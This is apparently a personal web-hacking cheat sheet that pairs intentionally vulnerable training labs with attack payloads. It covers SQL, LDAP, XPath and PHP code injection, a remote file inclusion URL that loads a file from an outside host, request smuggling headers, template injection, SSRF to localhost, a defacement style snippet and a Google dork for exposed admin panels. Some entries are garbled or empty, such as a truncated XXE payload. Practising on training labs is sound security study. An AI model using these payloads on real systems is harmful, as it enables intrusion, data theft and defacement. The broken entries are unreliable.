Lab : http://testphp.vulnweb.com/index.php Defacement :
<style> div { background-image: url('http://www.deepeddy.net/img/deepeddyfish.gif'); } </style>Lab : https://bwapp.hakhub.net/hpp-1.php Payload : &movie=2
Lab : https://juice-shop.herokuapp.com/#/login Payload : admin' or '1'='1'--
Google Dork - intitle:"phpLDAPadmin" inurl:cmd.php
Login Bypass - user=* password=* --> (&(user=)(password=))
Lab : https://portswigger.net/web-security/xxe/lab-exploiting-xxe-to-retrieve-files Payload :
]>&xxe;
Lab : https://bwapp.hakhub.net/xmli_1.php Payload : ' or id='1
Payload :
Lab : https://bwapp.hakhub.net/phpi.php Payload : system("ls")
Lab: https://bwapp.hakhub.net/rlfi.php http://zero.webappsecurity.com:8080/help.html?topic=http://bxss.me/t/fit.txt%3F.html
Lab : https://bwapp.hakhub.net/commandi.php
Lab : https://portswigger.net/web-security/request-smuggling/finding/lab-confirming-cl-te-via-differential-responses Payload : Content-Length: 35 Transfer-Encoding: chunked
0
GET /404 HTTP/1.1 X-Ignore: X
Lab : https://portswigger.net/web-security/server-side-template-injection/exploiting/lab-server-side-template-injection-basic Payload : <%= 7*7 %>
Lab : https://portswigger.net/web-security/ssrf/lab-basic-ssrf-against-localhost Payload : http://localhost/admin